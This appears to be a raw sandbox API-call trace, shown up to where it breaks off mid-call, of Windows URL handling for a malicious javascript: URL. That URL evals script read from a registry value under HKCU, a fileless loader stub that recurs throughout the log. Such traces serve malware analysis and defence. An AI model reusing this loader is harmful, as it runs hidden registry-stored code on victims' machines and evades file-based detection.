[0066.535] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f494 | out: pdwScheme=0x18f494*=0xf) returned 0x0 [0066.535] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc8) returned 0x64fcd8 [0066.535] GetCurrentProcessId () returned 0x5bc [0066.535] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f49c | out: ppvObject=0x18f49c*=0x63c68c) returned 0x0 [0066.535] IUnknown:Release (This=0x63c68c) returned 0x9 [0066.535] IUnknown:AddRef (This=0x63c68c) returned 0xa [0066.535] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f46c | out: pdwScheme=0x18f46c*=0xf) returned 0x0 [0066.535] IUri:GetAbsoluteUri (in: This=0x63c68c, pbstrAbsoluteUri=0x18f49c | out: pbstrAbsoluteUri=0x18f49c*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.535] GetProcAddress (hModule=0x76e40000, lpProcName=0x7) returned 0x76e44680 [0066.535] SysStringLen (param_1="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x64 [0066.535] CreateUri (in: pwzURI="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x18f4b8 | out: ppURI=0x18f4b8*=0x63be1c) returned 0x0 [0066.535] IUnknown:Release (This=0x63c68c) returned 0x9 [0066.536] IUri:GetScheme (in: This=0x63be1c, pdwScheme=0x18f44c | out: pdwScheme=0x18f44c*=0xf) returned 0x0 [0066.536] IUnknown:QueryInterface (in: This=0x63be1c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f454 | out: ppvObject=0x18f454*=0x63be1c) returned 0x0 [0066.536] IUnknown:Release (This=0x63be1c) returned 0x3 [0066.536] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0066.536] IUnknown:Release (This=0x63be1c) returned 0x3 [0066.536] IUnknown:AddRef (This=0x63be1c) returned 0x4 [0066.536] IUri:GetPropertyDWORD (in: This=0x63be1c, uriProp=0x11, pdwProperty=0x18f22c, dwFlags=0x0 | out: pdwProperty=0x18f22c*=0xf) returned 0x0 [0066.536] IInternetSecurityManager:GetSecurityId (in: This=0x643e78, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f290, pcbSecurityId=0x18f28c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f290*=0x6a, pcbSecurityId=0x18f28c*=0x68) returned 0x0 [0066.536] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f290, pcbSecurityId=0x18f28c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f290*=0x0, pcbSecurityId=0x18f28c*=0x200) returned 0x800c0011 [0066.536] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18eb68 | out: ppv=0x18eb68*=0x75028d20) returned 0x0 [0066.536] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ec54 | out: ppvObject=0x18ec54*=0x75028d2c) returned 0x0 [0066.537] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.537] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=3, dwParseFlags=0x0, pwzResult=0x63cef0, cchResult=0x65, pcchResult=0x18ec9c, dwReserved=0x0 | out: pwzResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18ec9c*=0x65) returned 0x0 [0066.537] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63cfc8 [0066.537] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63cfc8 | out: hHeap=0x610000) returned 1 [0066.537] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.537] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18eb68 | out: ppv=0x18eb68*=0x75028d20) returned 0x0 [0066.537] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ec54 | out: ppvObject=0x18ec54*=0x75028d2c) returned 0x0 [0066.537] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.537] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=17, dwParseFlags=0x0, pwzResult=0x63cef0, cchResult=0x65, pcchResult=0x18ecac, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18ecac*=0x0) returned 0x800c0011 [0066.537] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.538] IUnknown:Release (This=0x63be1c) returned 0x4 [0066.538] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f290 | out: hHeap=0x610000) returned 1 [0066.538] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x64fda8 [0066.538] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f308 | out: hHeap=0x610000) returned 1 [0066.538] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x64fe18 [0066.629] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f494 | out: pdwScheme=0x18f494*=0xf) returned 0x0 [0066.630] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.631] CreateCompatibleBitmap (hdc=0x1b0101ce, cx=1, cy=1) returned 0x305084a [0066.631] GetDIBits (in: hdc=0x1b0101ce, hbm=0x305084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x18f018, usage=0x0 | out: lpvBits=0x0, lpbmi=0x18f018) returned 1 [0066.631] GetDIBits (in: hdc=0x1b0101ce, hbm=0x305084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x18f018, usage=0x0 | out: lpvBits=0x0, lpbmi=0x18f018) returned 1 [0066.631] DeleteObject (ho=0x305084a) returned 1 [0066.631] GetSysColor (nIndex=0) returned 0xc8c8c8 [0066.631] GetSysColor (nIndex=1) returned 0x0 [0066.631] GetSysColor (nIndex=2) returned 0xd1b499 [0066.631] GetSysColor (nIndex=3) returned 0xdbcdbf [0066.631] GetSysColor (nIndex=4) returned 0xf0f0f0 [0066.631] GetSysColor (nIndex=5) returned 0xffffff [0066.631] GetSysColor (nIndex=6) returned 0x646464 [0066.631] GetSysColor (nIndex=7) returned 0x0 [0066.631] GetSysColor (nIndex=8) returned 0x0 [0066.631] GetSysColor (nIndex=9) returned 0x0 [0066.631] GetSysColor (nIndex=10) returned 0xb4b4b4 [0066.631] GetSysColor (nIndex=11) returned 0xfcf7f4 [0066.631] GetSysColor (nIndex=12) returned 0xababab [0066.631] GetSysColor (nIndex=13) returned 0xff9933 [0066.631] GetSysColor (nIndex=14) returned 0xffffff [0066.631] GetSysColor (nIndex=15) returned 0xf0f0f0 [0066.631] GetSysColor (nIndex=16) returned 0xa0a0a0 [0066.631] GetSysColor (nIndex=17) returned 0x6d6d6d [0066.631] GetSysColor (nIndex=18) returned 0x0 [0066.632] GetSysColor (nIndex=19) returned 0x544e43 [0066.632] GetSysColor (nIndex=20) returned 0xffffff [0066.632] GetSysColor (nIndex=21) returned 0x696969 [0066.632] GetSysColor (nIndex=22) returned 0xe3e3e3 [0066.632] GetSysColor (nIndex=23) returned 0x0 [0066.632] GetSysColor (nIndex=24) returned 0xe1ffff [0066.632] GetSysColor (nIndex=25) returned 0x0 [0066.632] GetSysColor (nIndex=26) returned 0xcc6600 [0066.632] GetSysColor (nIndex=27) returned 0xead1b9 [0066.632] GetSysColor (nIndex=28) returned 0xf2e4d7 [0066.632] GetSysColor (nIndex=29) returned 0xff9933 [0066.632] GetSysColor (nIndex=30) returned 0xf0f0f0 [0066.632] GetSysColor (nIndex=31) returned 0x0 [0066.632] GetSysColor (nIndex=32) returned 0x0 [0066.632] GetSysColor (nIndex=33) returned 0x0 [0066.632] GetSysColor (nIndex=34) returned 0x0 [0066.632] GetSysColor (nIndex=35) returned 0x0 [0066.632] GetSysColor (nIndex=36) returned 0x0 [0066.632] GetSysColor (nIndex=37) returned 0x0 [0066.632] GetSysColor (nIndex=38) returned 0x0 [0066.632] GetSysColor (nIndex=39) returned 0x0 [0066.632] GetSysColor (nIndex=40) returned 0x0 [0066.632] GetSysColor (nIndex=41) returned 0x0 [0066.632] GetSysColor (nIndex=42) returned 0x0 [0066.632] GetSysColor (nIndex=43) returned 0x0 [0066.632] GetSysColor (nIndex=44) returned 0x0 [0066.632] GetSysColor (nIndex=45) returned 0x0 [0066.632] GetSysColor (nIndex=46) returned 0x0 [0066.632] GetSysColor (nIndex=47) returned 0x0 [0066.632] GetSysColor (nIndex=48) returned 0x0 [0066.632] GetSysColor (nIndex=49) returned 0x0 [0066.632] GetSysColor (nIndex=50) returned 0x0 [0066.632] GetSysColor (nIndex=51) returned 0x0 [0066.633] GetSysColor (nIndex=52) returned 0x0 [0066.633] GetSysColor (nIndex=53) returned 0x0 [0066.633] GetSysColor (nIndex=54) returned 0x0 [0066.633] GetSysColor (nIndex=55) returned 0x0 [0066.633] GetSysColor (nIndex=56) returned 0x0 [0066.633] GetSysColor (nIndex=57) returned 0x0 [0066.633] GetSysColor (nIndex=58) returned 0x0 [0066.633] GetSysColor (nIndex=59) returned 0x0 [0066.633] GetSysColor (nIndex=60) returned 0x0 [0066.633] GetSysColor (nIndex=61) returned 0x0 [0066.633] GetSysColor (nIndex=62) returned 0x0 [0066.633] GetSysColor (nIndex=63) returned 0x0 [0066.633] GetDeviceCaps (hdc=0x1b0101ce, index=38) returned 32409 [0066.633] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.633] GetCurrentThreadId () returned 0x2a8 [0066.633] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f308 [0066.634] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x50) returned 0x650f68 [0066.634] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d788 [0066.635] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x62d1b0 [0066.635] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0066.635] GetCurrentThreadId () returned 0x2a8 [0066.635] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d788 | out: hHeap=0x610000) returned 1 [0066.635] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63cef0 [0066.635] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18f438 | out: ppu=0x18f438) returned 0x0 [0066.635] CreateUri (in: pwzURI="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x18f41c | out: ppURI=0x18f41c*=0x63be1c) returned 0x0 [0066.636] IUnknown:AddRef (This=0x63be1c) returned 0x6 [0066.636] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pdwZone=0x18f3bc, dwFlags=0x0 | out: pdwZone=0x18f3bc*=0xffffffff) returned 0x800c0011 [0066.636] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec90 | out: ppv=0x18ec90*=0x75028d20) returned 0x0 [0066.636] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ed7c | out: ppvObject=0x18ed7c*=0x75028d2c) returned 0x0 [0066.637] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.637] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=3, dwParseFlags=0x0, pwzResult=0x63cfc8, cchResult=0x65, pcchResult=0x18edc4, dwReserved=0x0 | out: pwzResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18edc4*=0x65) returned 0x0 [0066.637] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63d0a0 [0066.637] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63d0a0 | out: hHeap=0x610000) returned 1 [0066.637] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.637] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec90 | out: ppv=0x18ec90*=0x75028d20) returned 0x0 [0066.637] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ed7c | out: ppvObject=0x18ed7c*=0x75028d2c) returned 0x0 [0066.637] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.638] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=17, dwParseFlags=0x0, pwzResult=0x63cfc8, cchResult=0x65, pcchResult=0x18edd4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18edd4*=0x0) returned 0x800c0011 [0066.638] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.638] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.638] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.638] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.638] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwAction=0x2700, pPolicy=0x18f3c0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x18f3c0*=0x0) returned 0x0 [0066.638] IUnknown:Release (This=0x63be1c) returned 0x5 [0066.638] IUnknown:Release (This=0x63be1c) returned 0x4 [0066.638] IUnknown:AddRef (This=0x63be1c) returned 0x5 [0066.638] IUri:GetPropertyDWORD (in: This=0x63be1c, uriProp=0x11, pdwProperty=0x18f1f4, dwFlags=0x0 | out: pdwProperty=0x18f1f4*=0xf) returned 0x0 [0066.638] IInternetSecurityManager:GetSecurityId (in: This=0x643e78, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f250, pcbSecurityId=0x18f24c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f250*=0x6a, pcbSecurityId=0x18f24c*=0x68) returned 0x0 [0066.638] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pbSecurityId=0x18f250, pcbSecurityId=0x18f24c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18f250*=0x0, pcbSecurityId=0x18f24c*=0x200) returned 0x800c0011 [0066.638] IUnknown:Release (This=0x63be1c) returned 0x4 [0066.638] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.638] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x64fe88 [0066.639] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x18f474, dwReserved=0x0 | out: ppIInternetSession=0x18f474*=0x63ee70) returned 0x0 [0066.639] IInternetSession:RegisterNameSpace (This=0x63ee70, pCF=0x75028c50, rclsid=0x74c29790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.639] IUnknown:AddRef (This=0x75028c50) returned 0x1 [0066.639] IInternetSession:RegisterNameSpace (This=0x63ee70, pCF=0x75028c70, rclsid=0x74c29780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.640] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.640] StrCmpICW (pszStr1="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pszStr2="res://ieframe.dll/PhishSite.htm") returned -8 [0066.640] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f3e4 | out: ppvObject=0x18f3e4*=0x63c68c) returned 0x0 [0066.640] IUnknown:Release (This=0x63c68c) returned 0x9 [0066.640] IUnknown:AddRef (This=0x63c68c) returned 0xa [0066.640] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12c) returned 0x64fef8 [0066.640] IUnknown:AddRef (This=0x63c68c) returned 0xb [0066.640] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f3a8 | out: ppvObject=0x18f3a8*=0x63c68c) returned 0x0 [0066.640] IUnknown:Release (This=0x63c68c) returned 0xb [0066.640] IUnknown:AddRef (This=0x63c68c) returned 0xc [0066.640] IUnknown:Release (This=0x63c68c) returned 0xb [0066.640] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x624170 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb4) returned 0x650030 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x62d788 [0066.641] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f42c | out: pdwScheme=0x18f42c*=0xf) returned 0x0 [0066.641] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f434 | out: ppvObject=0x18f434*=0x63c68c) returned 0x0 [0066.641] IUnknown:Release (This=0x63c68c) returned 0xb [0066.641] IUnknown:AddRef (This=0x63c68c) returned 0xc [0066.641] IUnknown:Release (This=0x63c68c) returned 0xb [0066.641] IUri:IsEqual (in: This=0x63be1c, pUri=0x63c68c, pfEqual=0x18f474 | out: pfEqual=0x18f474*=1) returned 0x0 [0066.641] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x650fc0 [0066.641] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6337a8 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x650270 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x62d7f8 [0066.642] PostMessageW (hWnd=0x202ac, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12c) returned 0x6502d8 [0066.642] IUnknown:AddRef (This=0x63c68c) returned 0xc [0066.642] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f3c8 | out: ppvObject=0x18f3c8*=0x63c68c) returned 0x0 [0066.642] IUnknown:Release (This=0x63c68c) returned 0xc [0066.642] IUnknown:AddRef (This=0x63c68c) returned 0xd [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651018 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x68) returned 0x650410 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x108) returned 0x650480 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f290 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xcc) returned 0x63d328 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x64f7f0 [0066.642] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d830 [0066.643] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1b0) returned 0x650590 [0066.643] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f0cc | out: ppvObject=0x18f0cc*=0x63c68c) returned 0x0 [0066.643] IUnknown:Release (This=0x63c68c) returned 0xd [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0xe [0066.643] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0xf [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0x10 [0066.643] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f0c0 | out: ppvObject=0x18f0c0*=0x63c68c) returned 0x0 [0066.643] IUnknown:Release (This=0x63c68c) returned 0x10 [0066.643] IUnknown:AddRef (This=0x63c68c) returned 0x11 [0066.643] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x650698 | out: pdwScheme=0x650698*=0xf) returned 0x0 [0066.643] IMoniker:IsSystemMoniker (in: This=0x620638, pdwMksys=0x18f128 | out: pdwMksys=0x18f128*=0x6) returned 0x0 [0066.696] IUri:GetSchemeName (in: This=0x63c68c, pbstrSchemeName=0x18f080 | out: pbstrSchemeName=0x18f080*="javascript") returned 0x0 [0066.696] _wcsnicmp (_String1="javas", _String2="data", _MaxCount=0x5) returned 6 [0066.696] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f0cc | out: pdwScheme=0x18f0cc*=0xf) returned 0x0 [0066.696] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f08c | out: ppvObject=0x18f08c*=0x63c68c) returned 0x0 [0066.697] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.697] IUnknown:AddRef (This=0x63c68c) returned 0x12 [0066.697] CoInternetQueryInfo (in: pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", QueryOptions=0xd, dwQueryFlags=0x0, pvBuffer=0x18f0bc, cbBuffer=0x4, pcbBuffer=0x18f0b4, dwReserved=0x0 | out: pvBuffer=0x18f0bc*, pcbBuffer=0x18f0b4*=0x4) returned 0x0 [0066.698] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ef44 | out: ppv=0x18ef44*=0x75028d20) returned 0x0 [0066.698] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f030 | out: ppvObject=0x18f030*=0x75028d2c) returned 0x0 [0066.698] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.747] CoInternetParseUrl (in: pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=0x13, dwFlags=0x0, pszResult=0x18cff0, cchResult=0x1000, pcchResult=0x18cfec, dwReserved=0x0 | out: pszResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18cfec) returned 0x0 [0066.747] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ce80 | out: ppv=0x18ce80*=0x75028d20) returned 0x0 [0066.747] IUnknown:QueryInterface (in: This=0x75028d20, 